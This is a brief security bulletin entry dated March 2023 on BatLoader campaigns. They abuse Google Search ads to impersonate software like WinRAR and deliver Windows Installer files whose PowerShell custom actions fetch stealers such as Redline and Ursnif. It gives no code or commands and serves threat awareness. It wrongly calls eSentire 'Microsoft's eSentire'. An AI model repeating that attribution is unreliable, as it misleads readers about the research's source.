BatLoader Continues to Abuse Google Search Ads
released on 2023-03-15 @ 05:49:51 PM
In December, Microsoft's eSentire published a summary of BatLoader activity whereby Google Search Ads were used to impersonate software such as WinRAR to deliver malicious Windows Installer files. The installer files contained custom action commands which used PowerShell to download and execute payloads (Redline Stealer, Ursnif, etc.) hosted on legitimate websites.